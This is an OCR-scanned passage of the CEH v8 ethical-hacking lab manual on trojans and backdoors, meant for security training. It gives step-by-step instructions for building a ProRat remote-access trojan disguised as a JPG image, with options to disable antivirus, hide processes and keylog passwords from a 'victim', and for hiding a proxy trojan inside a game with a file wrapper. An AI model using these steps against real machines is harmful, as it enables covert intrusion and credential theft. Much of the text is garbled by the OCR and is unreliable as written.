CEH v8 Labs Module 06 Trojans and Backdoors

CEH Lab Manual

Trojans and Backdoors M odu l e 06 06

Module 06 - Trojans and Backdoors

Troja Tr ojans ns and B a ckd oo rs A Troja Trojan n is a progr program am that tha t con conttains ains a mali maliciou ciouss or harmful code ins insid idee appar apparen enttly harmless programming or data in such such a iray tha th a t it can can get ge t control control and an d cause cause damag damage, e, such as mining min ing the file all allocat ocatiion tabl able on on a hard hard dri drive. ve. ICON

KEY

1^ ~ ! Valuable information Test t o u t ______ __ knowledge ____ m

Web exer exercis cisee Workbook review

Lab Sce nario nari o According to Bank Into Security News (http://www.bankinfosecurity.com ( http://www.bankinfosecurity.com), ), Trojans pose serious risks tor any personal and sensitive information stored 011 compromised Android devices, the FBI warns. But experts say any mobile device is potentially at risk because the real problem is malicious applications, which 11 111 an open en vironm ent are impossible to control. And anywhere malicious apps are around, so is the potential for financial fraud. According to cyber security experts, the banking Trojan known as citadel, an advanced variant of zeus, is a keylogger that steals online-banking credentials by capturing keystrokes. Hackers then use stolen login IDs and passwords to access online accounts, take them over, and schedule fraudulent transactions. Hackers created tins Trojan that is specifically designed for financial fraud and sold 011 the black market. You are a security administrator of your company, and your job responsibilities include protecting the network from Trojans and backdoors, Trojan attacks, the theft o f valuable valuable data from the network, and identity theft. theft.

Lab O bjectives bjectives The objective of tins lab is to help students learn to detect attacks.

Trojan

and

backdoor

The objective of the lab include: ■ Creating a server and testing a netw ork for attack attack ■ Detecting Trojans and backdoors ■ Attacking a netw ork using sample Trojan s and doc um enting all all vulnerabilities and flaws detected &

T o o ls

demonstrated in this lab are available in D:\CEHTools\CEHv8 Module 06 Trojans and Backdoors

Lab E nvi nvironment ronment To carry out tins, you need: need: A computer mnning Window 7

Window Server Server 2008

as Guest-1 in virtual machine

mnning as Guest -2 in virtual machine

A web browser with Internet acce access ss ■ Administrative Admin istrative privileges privileges to ni n tools

CEH L ab Manual Page 425 425

Ethica l Ha ckin g and Cou ntem ieasures Copyrig Copyright ht © by EC-Counci EC-Councill All Rights Reserved. Reproduction is Stricdy Prohibited.


Lab Duration Time: 40 Minutes

Ov erview of Trojans Trojans and Backdoors A Trojan is a program that contains malicious or harm till till code cod e inside apparently harmless programming 01 data 11 111 such a way that tha t it can get control and cause damage, such as mining die file allocation table 011 a hard disk. With the help of a Trojan, an attacker gets access to s t o r e d p a s s w o r d s in a computer and would be able to read personal documents, delete files, display pictures, and/01 show messages 011 the screen.

Lab Task Task s TASK

1

Overview

Pick an organization diat you feel feel is is worthy o f your attention. Tins could be an educational institution, a commercial company, 01 perh aps a no np npro rotit tit chanty. chan ty. Recommended labs to assist you widi Trojans and backdoors: ■

Creating a Server Using the ProRat ProR at tool

■

Wrapp ing a Trojan Using On e File File EX E Maker

■

Proxy Server Trojan Troj an

■ HT TP Trojan ■

Remote Access Trojans Using Atelier Web Remote Com mand er Detecting Trojans Creating a Server Server Using the Theet Thee t

■ Creating a Server Using Usin g the Biodox ■ Creating a Server Using Usin g the MoSucker MoSu cker Hack Windows 7 using Metasploit

Lab An alysis alysis Analyze and document the results related to the lab exercise. Give your opinion 011 your target’s target’s security security posture postur e and exposure diroug d iroug h public and tree information.

P L E A S E T A LK T O Y O U R I N S T R U C T O R I F Y O U H A V E Q U E S T I O N S R E L A T E D T O T H I S L AB AB .

CE H Lab M anual Page 426 426

Ethica l Ha ckin g and Cou ntem ieasures Copyrigh Copyrightt © by EC-Council EC-Council All Rights Reserved. Reproduction is Stricdy Prohibited.


Lab

Creati Creatin g a Serv er Using Using th e ProRat Tool A Troj Trojan is a progra program m that cont contains ains mal maliciou ciouss or harmful harmful co code insi inside de appare apparent nt//) harmless programming or data in such a way that it can get control and cause damage damage,, such as mining min ing the file all allocat ocatiion tabl tablee on on a hard hard drive rive.. ICON

Lab Scenario

KEY

1^7 Valuable information

As more and more people regularly use die Internet, cyber security is becoming more important for everyone, and yet many people are not aware of it. Hacker are using malware to hack personal information, financial data, and business information by infecting infecting systems systems with viruses, viruses, worms, and Trojan horses. But Internet security is not only about protecting your machine from malware; hackers can also sniff your data, which means that the hackers can listen to your communication with another machine. Other attacks include spoofing, mapping, and hijacking.

Test your knowledge =

Web exercise exercise

m

Workbook review review

Some hackers may take control of your and many other machines to conduct a denial-of-service attack, which makes target computers unavailable for normal busines bus iness. s. Ag ainst ain st hig h-p rofile rof ile web we b servers serv ers such suc h as ban ks and an d credit cre dit card gateways. You are a security administrator of your company, and your job responsibilities include protecting the network from Trojans and backdoors, Trojan attacks, theft o f valuab valuable le data from the network, and identity theft. theft.

Lab Objectives &

T o o ls

demonstrated in this lab are available in D:\CEHTools\CEHv8

The objective objective of tins tins lab is is to help suidents learn to d etect Trojan and backd oor attacks. The objectives of the lab include: ■

Creating a server and testing testing the netw ork for attack

■

Detecting Trojans and backdoors

Module 06 Trojans and Backdoors


Ethica l Ha ckin g and Coun termea sures Copyright Copyright © by EC-Counci EC-Councill All Rights Reserved. Reproduction is Stricdy Prohibited.


Attacking a network using sample Trojans ancl documenting all vulnerabilities and flaws detected

Lab Environment To earn tins out, you need: need: ■

The Pro rat tool located at D:\CEHD:\CEH-Too Tools\ ls\CEHv CEHv88 Module 06 Tro jans and Backdoors\Trojans Types\Remote Access Trojans (RAT)\ProRat

■

A com puter runn running ing Windows Server 2012 as Host Machine

■

A com puter runn running ing Window 8 (Virtual (Virtual Machine)

■

Windows Serv er 200 2008 8 runnin g 111Virtual Machine A web brow ser with Intern et access access Administrative privileges to run tools

Lab Duration Tune: 20 Minutes

Ov erview of Trojans Trojans and and Backdoors A Trojan is a program that contains malicious or harmful code inside apparently harmless programming or data in such a way that it can get control and cause damage, such as ruining die file allocation table on a hard drive. Note: Note : The T he versions ver sions o f the created c reated Client or H os t and an d appearan app earance ce o f the website webs ite may differ from w hat is 111 die lab, bu t the acmal process o f creating the the server and die client is the same as sho s hown wn 11 111diis 1d iis lab.

Lab Task Task s Create Server with ProRat

Launch Windows 8 Virtual Machine and navigate navigate to Z:\CEH Z:\CEHv8 v8 Module 06 Trojans and Backdoors\Trojans Types\Remote Types\Remote A ccess Trojans (RAT)\ProRat. 2. Dou ble-click Pro Ra t.ex e 111Win dow s 8 Virtual Machine.

Click Cre ate Pro Rat S erve r to start preparing to create create a server server.. 3. Click


Ethica l Ha ckin g and Coun termeas ures Copyright Copyright © by EC-Counci EC-Councill All Rights Reserved. Reproduction is Stricdy Prohibited.

M o d u l e 0 6 - T r o ja ja n s a n d B a c k d o o r s

P f l DHR CH. n E T F « OF OF E 55 55 I C] f >HL I f l TEHnET TEHnET !!! Connect English

PC Info

Applications

Message

Windows

Funny Stuff

File Manager

!Explorer

Search Files

Control Panel

Registry

Admin-FTP

Shut Down PC Clipboard

KeyLogger

Give Damage

Passwords

R. Downloder Printer Online Editor ProConnective Create Create Downloader Server (2 Kbayt) Create CGI Victim List (16 Kbayt)

^Help FIGURE 1.1: ProRat main window

appear ears. s. 4 . The Create Serve r window app Create Server ProConnective Notification (Network and Router) Supports Reverse Connection

Notifications 1y=J 1y=J Pass word button: Retrieve passwords passwords from many services, such as po p3 ac co un ts , m es se ng er , IE, mail, etc.

Test

Use ProConnective Notification IP (DNS) Address:

General Settings

»ou. no* no *1p.com

Mail Notification Doesn't support Reverse Connection

Bind with File

Test

Q Use Mail Mail Notification Notification E-MAIL: [email protected]

Server Extensions

ICQ Pager Notification Doesn't suppoit Reverse Connection Q Use ICQ ICQ Pager Notificatio Notification n

Server Icon

ic q u i n

:

Test

[r]

CGI Notification Doesn't support Reverse Connection

W) Help

Test

Q Use CGI CGI Notification Notification w.yoursite. e. com/cgi-bin/prorat. cgi CGI URL: http: //w w w.yoursit

Server Size: Size:

r

Create Server

342 Kbayt

FIGU RE 1. 1.2: 2: ProRat Create Server Window

Click Gen eral Se ttin gs to change change feature features, s, such as Se rve r Port. Server 5. Click Passw ord, Victim Victim Name, and the Port Num ber you wish wish to connect over the connection you have to the victim or live the settings default.

6. Un check the highlighted optio ns as show n 111 the following screensho t.

C E H L a b M a n u a l P a g e 42 42 9



Server Port: Server Password: Vict im Name: Name:

General Settings

Q Bind with File

Server Extensions

3ive a fake error error messag message. e.

Q

••1elt server on install.

Q

Cill AV-FW on start. start.

Q

disabl disable e Windows XP SP2 Security Security Cente Center r

I...... Q Disable Disable Windows XP Firewa Firewall. ll.

Server Icon

Q

Hear Hear Windows XP Restore Points Points..

Q

)on't send send LAN notifi notificati cations ons fro from m ( i 92.i 68.”.“j 68.”.“j or (10.*. (10.*.xx.xj .xj

I I Protection for removing Local Server Invisibility Q Hide Process Processes es from from All Task Managers Managers (9x/2k/X P)

Ity ! Note: you can use Dynamic DNS to connect over the Intern et by using using no-ip account registration registration..

Q Hide Values Values From From All All kind of Registry Registry Editors Editors (9x/2k/X P) Q Hide Names Names Fro From m Msconfig Msconfig (9x/2k/K P) Q UnT erminate erminate Process Process (2k/XP) Server Size: Size:

r

Create Server

342 Kbayt

FIG UR E 1. 1.3: 3: ProRat Create Server-General Settin Settings gs

7. 8.

Click Bind with File to bind bin d th e server w ith a file; file; 111 tins lab we are using the .jpg file to bind the server. Check

Bind server with a file.

Click

andnavigate navigate S e l e c t F i l e , and

to

Z:\CEHv8 Module 06 Trojans and Backdoors\Trojans Ty pes\Remote A c c e s s T r o j a n s ( R A T ) \P \P r o R a t\ t\ lm lm a g e s .

9. Select the

m Clipboard: To

Girl.jpg

file file to bind w ith the server. server.

read

data from random access memory.

This File will be Binded: Bind with File

Server Extensions

Server Icon

Server Size: Size:

Create Server

342 Kbayt

I------------------------------------------FIGU RE 1.4: 1.4: ProRat Binding with a file file

C E H L a b M a n u a l P a g e 43 43 0



10. Select Girl.jpg 111 the window and then clic clickk Open to bind the file.

Look in:

Images

11° £Q1 VNC V NC Trojan starts a VNC server daemon in the infected system. system.

File name:

Girl

Open Cancel

Files Files of typ e:

FIGURE FIG URE 1.5 1.5:: ProRat binding bind ing an image

11. Click OK after selecting the image for binding with a server.

£ 9 File File mana manage ger: r: To manage victim directory for add, delete, and modify.

12. 111 Server Extensions settings, select EXE (lias icon support) 111 S e l e c t Server Extension options.

CEH Lab Manual Page 43 431



Select Server Extension

Notifications

^

EXE EXE (Has (Has icon suppo support) rt)

Q PIF (Has no icon support) support)

General Settings

Q

Q SCR SCR (Has (Has icon suppo support) rt) Q COM COM (Has no icon support) support)

BAT (Has (Has no icon suppo support) rt)

Bind with File

Server Extensions

Server Icon

£ Q Give Damage: Damage: To format the entire system files. Server Size:

r

Create Server

497 Kbayt

FIGURE 1. 1.77: ProRat Server Extensions Settings

13. 111 Server Icon select any of the icons, and click the Create Server but b ut to n at b ot to m right rig ht side o f th e P ro roRa Ra t wind w indow ow..

Notifications

General Settings

M Bind with File

Server Extensions

It connects to the victim using any VNC viewer with the password “secret.” m

H U 11

Server Icon

j J

V) Help Server Icon: Server Size:

Choose new Icon Create Server

497 Kbayt

I FIGURE 1.8: ProRat creating a server

14. Click OK atter the server has been prepared, as shown 111 the tollowing screenshot.


Ethica l Hac king and C ounte nneas ures Copyright Copyright © by EC-Counci EC-Councill All Rights Reserved. Reproduction is Stricdy Prohibited.


FIGURE 1.9: PioRat Server has created 111 die same current directory

15. Now you can send die server file by mail or any comm unication media to the victim’s machine as, for example, a celebration file to run. £ G SHTTPD is a small small HTTP server that can be embedded inside any program. prog ram. It can be wrapped with a genuine program (game cl1ess.exe). When executed, it turns a computer into an invisible web server.

Applicator Tools Tools Vicvr

E

Extra large icons S t Extra

fj fi Details pane

ft | M M5 5 d u n ico n s

S

A&

Man ag e

m Preriew pane

Lirt

Large icons || j Small Small ico n s |j

Details

t N" ₪

□

Item check boxes boxes

□

Filen ame ex ten sio sio n s

I I Hi dden items

______________ ______________ Layout _________ _________

o

©

^

Show/hide

« Trcjan Trcjanss Types Types ►Femote ►Femote Access Access Troj Trojan anss (RAT)

A K Favorites

*.

J . D o w n l ea ea d

D es es kktt op op

Ir Irrraces aces

£ Do wn lo ad ad }

J . L a n g u a ge ge

■

1

|^

1S3J S3J Rec ent pl aces

b n d e d ..ss e r v er er |

^ 1F n gl gl i sh sh £

raries es 1^ f Lib rari

P ro ro Ra Ra t

F*| F*| Do cu m tn te

j__ Re ad me

J* Music

^ T

f c l P i c t u «c

|__ Version.Renewals

rk 6 h

Qj Videos

Homegrojp

Computei sL , Local Disk O

5 ? CE CEHH-To To o ls (\\1 a

^( ^(11 Netwo rk 9 items

v

1 item selected 2 0 8 M MB B

FIGURE 1.10: ProRat Create Server

16. Now go to Windows Server 2008 and navigate to Z:\CEHv8 Module 06 Trojans Trojans and and Backdoors\Trojans Typ es\Remo te A cc es s Trojans Trojans (RAT)\ProRat.

17. Double-click binder_server.exe as shown 111 the following screenshot.


Ethica l Ha ckin g and Coun termeas ures Copyright Copyright © by EC-Counci EC-Councill All Rights Reserved. Reprodu ction is Strictly Prohibited.


p

. El•

id t

|

T 0J%n(Trt>« » Rencte Acr« s "roiflr s RAT(

^•w

Tjolc

* PraRat

ital

t#lp

View

Oroanize ▼ •

M t Tavoi ite -» ks

I•I Site

^

0° *°

T"T ™----------------- Pate modifi odified— ed—

H

i | r>ornn#ntc ?1 cajres

£ ^

Music More

»

Folders Botnet 'rojars J i Botnet

I

^

[^ uHoct

j j

j , Ya5»cn_R.c «n o 5

Comnand Shell ~r 0)s

I

Defacene nt ro;ars

I

J4 Destnjave T'ojan T'ojanss

I

[ : R e ad ad ne ne

v

I

Ebandng Trojans

I J4 E-Mal T0 j3ns I JA FTP Trojar I

GUITrojors

I

HTTPHI PS "rpjars

I

S

ICMP Backdoo Backdoor r

I J4 MACOSXTrojons I J i Proxy Server Trojan: . Remote Remote Acces Accesss “rcj?“rcj?- * I

J . Apocalypse

I

4 . D*fk D*fkCo Cor«tRAT

I

j.. ProRat

X Atelie Web Remji

I £

. VNC’rojans C’rojans M ar ar l

H

C

S.

. New Text Docu nei l • No... I

‘

-O g*

FIGURE FIG URE 1.11: 1.11: ProRat Windows Server 2008

ICMP Trojan: Covert channels are methods in which an attacker can hide data in a protocol diat is undetectable.

18. 18. Now No w switch to Windows 8 Virtual Machine and enter the IP address o f Windows Windows Server 200 8 and the live port number as the default 111 the ProRat main window and click click Connect. 19. 19. 111 tins lab, the IP address addres s o f Windows Wind ows Server 2008 is (10.0.0.13) (10.0.0.13) Note: IP addresses might be differ F

T

classroom labs

111

P ro ro R at at V1 .9 .9

mum PC In Info

-

Poit

Applications

Message

Windows

Chat

Adm Admin-FT in-FTP P

Funn Funny y Stu Stuff ff

File ile Man Manag ager er

!Explorer

Searc arch Fil Files

Contro trol Panel

Registr istry y

Shut Down PC Screen Shot Clipboard

KeyLogger

Give Damage

Passwords

R. Downloder Printer

Services

Online Editor ProConnective Create

FIGURE 112: ProRat Connecting Infected Infecte d Server

20. Enter the password you provided at the time ol creating the server and click OK.



|-| Typ Typ |-


Password:

OK

Cancel

FIGURE 1.1 1.13: 3: ProRat connection window

21 21.. No w you are are c o n n e c t e d to the victim machine. machine. To test the connection, click PC Info and choose the system information as 111 the following figure. BfP > > — P ro R a tV o n n e c te d [10.0.0.13^^^HBBB^^^^^r - x1 1.9 IC P P D H P C H . n E T P P O F E 5 5 I C 1 n F I L i n T E R r i E T !! !!! Covert channels rely on techniques called tunneling, which allow one protocol to be carried carried over over another protocol.

Poit: g m

m

IB

English

PC In Info

Applications

Message

Windows

r

Disconnect

//////// PC Information ////////

C o m p u t e r Name U se r Na me Chat Admin-FTP Windows Uer Funn Funnyy Stu Stuff ff File Man Manag ager er W in in do do ws ws La La ng ng ua ua ge ge W i n d o w s Pat h !Explore lorerr Searc earch h Fi Files S y s t e m Pat h Contro trol Panel Registr istryy Temp Path Shut Down PC Screen Shot Productld KeyLogger Clipboard Work gro up Give Give Dama Damage ge Pass Passwo word rdss Da ta R. Downloder

Run

Printer

Services

Onlin Online e Edito Editorr

F'roC F'roCon onne nectiv ctive e

l

Create Pc information Received.

10

WI N - E G B H I S G 1 4 L 0 Adm in i st r at o r E ng ng li li sh sh ( Un Un it it ed ed St St C :\ :\W i nd ow s C :\ :\ Wi n d o w s\ s y s t e m c C:\Users\ADMINI~1\ NO 9/ 2 3/20 12

-L System Information

Mail Address in Registry

Last visited 25 web sites

W; Help

FIGURE 1.14 1.14:: ProRat connected computer wid ow

22. Now click KeyLogger to steal user passwords for the online system. m

TASK

2 [ r ? ~ ^ r o R a ^ 7 ^ o n n e c t e d n 0 l0 l0 ^ 3 r ~ P H □ H R C H .

Attack System Using Keylogger

E T P P G re S S ID n P L

P011: g n i R:

ip: Q j Q 2

in T E P riE T

!!!

I I 111 h

Disconnect

//////// PC Information //////// PC In Info

Applications

Message

Windows

C o m p u t e r Name U se r Na me Chat Admin-FTP Windows Uer Funny unny Stuf Stufff File Man Manag ager er W in in do do ws ws La La ng ng ua ua ge ge W i n d o w s Pat h !Explor lorer Searc earch h Fi Files S y s t e m Pa Pat h Contro trol Panel Registr istryy T em p Path Shut Shut Down Down PC PC Screen Screen Sho Shott Productld Clipboard KeyLogger Workgroup Give Give Damag amage e Pass Passwo word rdss Da ta R. Downloder

Run

Printer

Services

Online Editor ProConnective Create Pc information Received.

WI N - E G B H I S G 1 4 L 0 Adm in i st r at o r E ng ng li li sh sh ( Un Un it it ed ed St St C :\ :\W i nd ow s C :\ : \ W i n d o w s \ s y sterna C:\U s er s \A D HI NI ~ 1\ NO 9/ 2 3/20 12

Li. System Information

Mail Address in Registry

Last visited 25 web sites

W; Help

FIGURE 1.15: ProRat KeyLogger button


Ethica l Ha ckin g and Coun termeas ures Copyright Copyright © by EC-Counci EC-Councill All Rights Reserved. Reprodu ction is Strictly Prohibited.


23. The Key Logger window will appear.

works m Tliis Trojan works like a remote desktop access. access. The T he hacker gains complete GUI access of the remote remo te system: ■ Infect victim’s victim’s computer with server.exe and plant Reverse Connecting Trojan. ■ The Troja Trojan n connect connectss to victim’s Port to the attacker and establishing a reverse connection. ■ Attacker Attacker then has has complete control over victim’s machine.

FIGURE 1.1 1.16: 6: ProRat KeyLogger window window

24. Now switch to Windows Server 2008 machine and open a browser or N otep ot ep ad and type any text. i T e x t

File

Hi

Edit

D o c u m e n t - N o t ep ep a d

Format

View

Help

there

T h i s i s my u s e r n a m e : x y z @ y a h o o . c o m p a s s w o rd : te st <3 @ #S !@ l|

Trojan s are m Banking Trojans program that that steals steals data data from infected computers via web browsers and protected storag storage. e.

Ik.

A FIGURE 1.1 1.17: 7: Test typed in Windows Windows Server 2008 2008 Notepad

25. W hile the victim is writing a m e s s a g e or entering a user name and pas sw or ord, d, y ou can cap mre mr e the log entity. 26. Now switch to Windows 8 Virtual Machine and click Read Log from time to time to check for data updates trom the victim victim machine.




E =9/23/201211:55:28 PMPMahi bob this is my usemame;xyzatyahoo.com password; password; testshiftl buttow ithl shiftbuttonwith2 shiftbuttonwith2

|

Read Log

|

Delete Log

L•^L1 •^L 1 — UL 1 !_•

11•_t 1

Save as C□

Clear Screen

Help

1----------------------------------------------

|Key Log Received. Received.

|

FIGURE 1.1 1.18: 8: ProRat KeyLogger window

27 27..

No w you can use a lot o f feauires feauires from ProR at on the victim’s victim’s machine. machine.

Note: ProRat Keylogger will not read special characters.

Lab An alysis alysis Analyze and document die results related to die lab exercise. Give your opinion on your target’s secunty posture and exposure dirough public and free information.

P L E A S E T AL A L K T O Y O U R I N S T R U C T O R I F Y OU OU H A V E Q U E S T I O N S RELATED TO THIS LAB.

Questions 1. Create a server server wk h advanced options such as Kill Kill AV-FW AV -FW on start, start, disable disable Window s XP Firewal Firewall, l, etc., etc., send it and con nect it to the th e victim machine, and verify whedier wh edier you can communicate commu nicate with the victim machine. 2. Evaluate and examine various mediods to co nnect to victims victims if diey are 111 odier odie r cities cities o r countries.




T o o l/ l/ U t il il i t y

I n fo fo rm rm a ti ti o n C o l le le ct ct e d/ d / O b je je ct c t i v es e s A c hi hi e v ed ed Successful creation of Blinded server.exe O utpu t: PC Informat Information ion Comp uter NameAY IN-EGBHISG 14LO 14LO User Name: Administrator W indo ws Yer:

ProRat Tool

Windows Language: English (United States) W indows Path: c:\windows System Path: c:\windows\system32 Temp Pat Path: c:\Users\A D M IN I~l\ Product ID: Workgroup: Workgrou p: N O Data: Data: 9/23/201 2

Internet Connection R equired □ Y es

0 No

Platform Supported 0 C l as as s ro ro o m


0 !Labs



L ab

Wrapp Wrapping ing a Troja Tro jan n Using One File EXE Maker Mak er A Trojan is aprogram that contains malicious or harm harmfful code inside apparently harmless pr programming or dat data in su such a way that it canget controland and cause damag damage, e, such as minin mining g the file file al allocation table on a hard ard drive. ICON

Lab Scenario

KEY

£17 Valuable information Test your knowledge Web exercise Workbook review review

Sometimes an attacker makes a very secure backdoor even more safer than the normal way to get into a system. system. A no rmal user may use only one passw ord for using the system, but a backdoor may need many authentications or SSH layers to let attackers use the system. Usually it is harder to get into the victim system from installed backdoors compared with normal logging 111. After getting control of the victim system by an attacker, the attacker installs a backdoor on the victim system to keep 111s or her access in the future. It is as easy as running a command on the victim machine. Another way the attacker can install a ba ckdo ck do or is using usi ng ActiveX Act iveX . Wlien Wl ieneve eve r a user us er visits visit s a webs we bsite, ite, em bedd be dd ed ActiveX could run on the system. Most of websites show a message about running ActiveX for voice chat, downloading applications, or verifying the user. 111 orde r to pro tect your system from attacks by Trojan s and need extensive knowledge on creating Trojans and backdoors and protecting the system from attackers. You are a security security administrator o f your company, and your job responsibil responsibiliti ities es include include protecting the network from Trojans and backdoors, Tro jan attacks, attacks, theft o f valuab valuable le data from the network, and identity theft. theft.

& T o o ls demonstrated in this lab are available in D:\CEHTools\CEHv 8 Module 06 Trojans and Backdoors


Lab Objectives The objective objective of tins lab lab is to to help smdents learn to de tect Trojan and backdoor attacks. The objectives of the lab mclude: ■

Wrap ping a Trojan with a game 111 Windows Server 2008

■

Runn ing the Troja n to access the game on the fron t end



■

Analyzing the Troja n runn ing in backend

Lab Environment To carry out diis, you need: OneFileEXEMaker tool located at D:\CEH-Tools\CEHv 8 Module 06 Trojans and Backdoors\Wrapper Covert Programs\OneFileExeMaker

■

A compu ter running Window Window Server 2012 (host) Windows Server 200 8 runn running ing in virtual machine

■ It you decide to dow nload the the latest version, then screenshots shown 111 the lab might differ ■

Administrative Admin istrative privileges privileges to run tools


Ov erview of Trojans Trojans and and Backdoors A Trojan is a program diat contains malicious or harmful code inside apparendy harmless programming or data 111 such a way that it can get control and cause damage, such as ruining die hie allocation table on a hard drive. Note: The versions of die created client or host and appearance may ditfer from

what is 111 die lab, but die actual process of connecting to die server and accessing die processes is same as shown 111 dus lab. H

TASK

1

OneFile EXE Maker

Lab Task Task s 1. Install OneFileEXEMaker on Windows Server 2008 Virtual Machine. Senna Spy One EXE Mak er 2000

2.0a

Senn a Spy Spy One EXE Maker 2000 - 2.0a Official Website: e-mail:

http://sennaspy.tsx.org

senna_spy0 holma1l.com

ICQ UIN

3973927

Join many files and make a unique EXE file. This piogram allow join all kind of files: exe, dll. ocx. txt, jpg. bmp Automatic OCX file register and Pack files support Windows 9x. NT and 2000 compatible ! Short File Name

Parameters

10 pen Mode | Copy To

Command Line Parameters.

m

Copyright (C). 1998-2000. By Senna Spy

Open Mode C Normal C Maximized C Minimized C Hide

Copy To-----(“ Windows C System C Temp C Root

| Act ion

Action-----C Open/Execute C Copy Only

r

Pack Pack Fies? Fies?

FIGURE 3.1: OneFile EXE Maker Home screen




Click die Add File butto bu ttonn and browse brow se to the CEHCE H-To Tools ols folder at die location Z:\CEHv8 Module 06 Trojans and Backdoors\Games\Tetris and add die Lazaris.exe hie. Senna Spy One EXE EXE Make r 2000 - 2.0a

Senn a Spy Spy One EXE Maker 2000 - 2.0a Official Website:

less! less! You can set various tool options as Open mode, Copy to, Action

e-mail:

http://sennaspy tsx http://sennaspy tsx org

senna_spy@hotma 1l.com

ICQ UIN

3973927

Join many files and make a unique EXE file. This program allow join all kind of files: exe. dll, ocx. txt, jpg, bmp . Automatic OCX file register and Pack files support Windows 9x. NT and 2000 compatible ! [ s h o r t F ile Name

| P a r a m e t e rs

| 0 p e n M ode |C o py To

LAZA RIS.EXE

H id e

System

| A c ti o n

!

Add Fie

| O p e n /E xe cu t e Getete

1

Save Ejj* Command Line Parameters

O pe pe n Mo de de

Cop y T0 -----

C Normal Copyright (C). 1998-2000. By Senna Spy

C Windows r Maximiz Maximized ed (* System C Minimized C Temp (5 Hide C Root

(• Open/Execute C Copy On|y

FIGURE 3.2: Adding Lazaris game

3. Click

Add File and browse to the CEH-Tools folder at die location Z:\CEHv8 Module 06 Trojans and Backdoors\Trojans Types\Proxy Server Trojans and add die mcafee.exe file.

Senna Spy One EXE Maker 2000 - 2.0a Official Website: e-mail:


http://sennaspy.tsx.org

[email protected]

ICQ UIN

3973927

Join many files and make a unique EXE file. This program program allow join all kind of files: exe. dll. ocx. txt, jpg. bmp Automatic OCX file register and Pack files support Windows 9x. NT and 2000 compatible I Short File Name

Parameters

| Open Mode | Copy To

|Actio n

System

Open/Execute

ISystem

|Open/Execute

Add Fie

delete Save

Command Line Parameters

Copyright |C|, 1998-2000. By Senna Spy

O pe pe n Mo de de C Normal C Maximized C Minimized (* Hide

Cop y To!-----

C Windows (* System Temp

Action-----(• Operv Execute C Copy Only

r

P a ck ck F ie ie s ?

C Root

FIGURE 3.3: Adding MCAFEE.EXE proxy server

4. Select Mcafee and type 8 0 8 0 111 die Command Line Parameters field.




Senna Spy One EXE Mak er 2000

2.0a

Senna Spy Spy One EXE Maker 2000 2000 2.0 2.0 a Official Web site e-mail:

http ://sennaspy tsx org

[email protected]

ICQ UIN:

3973927

Join many files and make a unique EXE file. This piogram allow !oin all kind of files: exe. dll. ocx. txt. jpg. bmp Automatic OCX file !egistei and Pack files support support Windows 9x. NT and 2000 compatible ! Short File Name

Paiameters

Open Mode Copy To

LAZARIS.EXE

System

Action Open/Execute Open/Execute

Save Command Li ne Parameters

Copyright (C). 1998-2000. By Senna Spy

Open Mode— C Normal C Maximized C Minimized ^ Hide ide

Copy To-----C Windows (* System Temp C Root

Open Open/Ex /Exec ecut ute e

“ P*k Fles?

C Copy On|y

FIGURE 3.4: Assigning port 8080 to MCAFEE

5.

Select Lazaris and check die Normal option in Open Mode. Senna Spy One EX£ EX£ Mak er 2000

2.0a

Senn a Spy One EXE Maker 2000 2000 2.0 a Official Web site: e-mail:

http ://sennaspy tsx org

[email protected]

ICQ ICQ UIN

39/3927

Join many files and make a unique EXE file. This piogram allow join all kind of files: exe. dll. ocx. txt. jpg. bmp ... Automatic OCX file register and Pack files support Windows 9x. NT and 2000 compatible ! Add Fie LAZA RIS.EXE MCAFEE EXE

N otm a l 8 08 08 0

H id id e

(S ystem

I O p e n /E x e c u te I

Sys te te m

O pe pe n/ n/ Ex Ex ec ec ut ut e

Delete

Save Exit Open Mode

Command Li ne Parameters

: p.0 1 ™

. Jaximiz Jaximized ed 1 Maximize

^ © 2 Copyright g ht (C). (C). 1998 2000. By Senna Spy Spy

C Minimized C Hide

Copy To-----C Windows <• System C Temp C Root

Action (• Operv Execute C Copy On|y

r

Pack Fies?

FIGURE 3.5: Setting Lazaris open mode

6. Click Save and browse to save die tile on the desktop, and name die tile Tetris.exe.




Save Save n | K 1

-» * 0

Name * e-mail:

sennas

2[

I - I Size

0

1*1 Type

®

a

1*1 Date modified

1

^Pubk :■ Comp Compute uterr 4* Network Network ®MoziaFrefbx £ Google Chrome

1KB Shortcut 2 KB Shor Shortcu tcutt

9/18/2012 2:31 Af 9/18/2012 2:30 AT

_ l Short File Name

± 1

|------ Save------ 1 (Executa bles (*.exe)

MCAFEE.EXE

_^J

Cancel

|

Save L Copyright (C), 1998-2000. By Senna Spy

Open Mode (• Normal C Maximized C Minimized C Hide

Copy To C Windows (* System (" Temp C Root

(• Open/Execute C Copy 0n|y

r

Pack Pack Fies? Fies?

FIGURE 3.6: Trojan created MCAFEE.EXE MCAFEE.E XE will run in backgro background und m

7. N ow double-click double-click to open die Tetris.exe file. Tliis will launch die Lazaris , g am€> 011 011 th e tr0 11 t e

, d•

r FIGURE 3.7: La 2aris game

8.


Now open Task Manager and click die Processes tab to check it McAfee is running.



^

£J Windows Task Manager File

Options

View

Applications

Processes

I m ag a g e .. .

[* [

Help

jServices | Performance j Networking | Users |

1 Us Use r N am e 1[ c

pu

Description n ] Memory (... | Descriptio

c srs s . e x e

SYSTEM

00

1 .4 6 4 K

Client Ser...

c srs s . e x e

SYSTEM

00

1 . 73 73 6 K

C lili en en t S e r .... .

d w m .e x e

A d m l n is t . ..

00

1 ,2 0 0 K

e x p lo re r.e x e

A d m m i s t. ..

00

14,804 K

| 1

D e s k to p . .. W in d o w s . . .

LAZARIS.EXE ...

A d m ln i s t. . .

00

1 .5 4 0 K

LAZAR IS

Isass.exe

SYSTEM

00

3 ,1 0 0 K

Local S e c u . . . -

Is m .ex e

SYSTEM

00

1.38 84 4K

L oc oc al al S es es s. s. .. ..

A d m ns ns t . . .

00

580 K

N E T W O .. .

00

2 .8 3 2 K

1 MCAFEE.EXE .... . m sd tc.e xe

MCAFEE MS D T C c o . . .

S cr cre en en pr pre s so so .... . .

A dm dm iriri l s t. . .

00

2 8. 8. 3 80 80 K

S cr cr e en en pr pre .... .

s e rv i c e s . e x e

SYSTEM

00

1 .9 9 2 K

S erv ic es a. a. . .

S Ls v c. e xe

N E T W O .. .

00

6 .7 4 8 K

M ic ro s o f t .. .

smss.exe

SYSTEM

00

304 K

Windows ...

spoolsv.exe

SYSTEM

00

3 .5 8 8 K

Spooler S...

svchost.exe

SYSTEM

00

1 3 ,5 08 K

H o s t P ro c . ..

s vc h o s t.e x e

LOCAL . . .

00

3 .6 4 8 K

H o s t P ro c .. .

I*

Show processes from all users

|jPro :ess es: 40

CPU Usage: 2°.c

